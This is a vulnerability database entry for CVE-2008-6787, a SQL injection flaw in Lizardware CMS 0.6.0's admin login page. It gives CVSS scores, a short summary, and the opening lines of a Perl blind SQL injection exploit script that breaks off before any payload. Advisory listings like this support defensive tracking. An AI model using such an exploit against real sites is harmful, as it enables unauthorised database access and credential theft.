7.5
CVSSv2

CVE-2008-6787

Published: 01/05/2009 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in administrator/index.php in Lizardware CMS 0.6.0 and previous versions allows remote malicious users to execute arbitrary SQL commands via the user.

Vulnerable Product Search on Vulmon Subscribe to Product

jeremy powers lizardware cms

jeremy powers lizardware cms 0.6.0

Exploits

#!/usr/bin/perl -w # Lizardware CMS <= 060 Blind SQL Injection Exploit # by athos - staker[at]hotmail[dot]it # sourceforgenet/projects/lizardwarecms/ use strict; use LWP::UserAgent; my ($stop,$start,$hash); my $domain = shift; my $ptable = shift; my $userid = shift or &usage; my @chars = (4857, 97102); my $substr = 1; my ...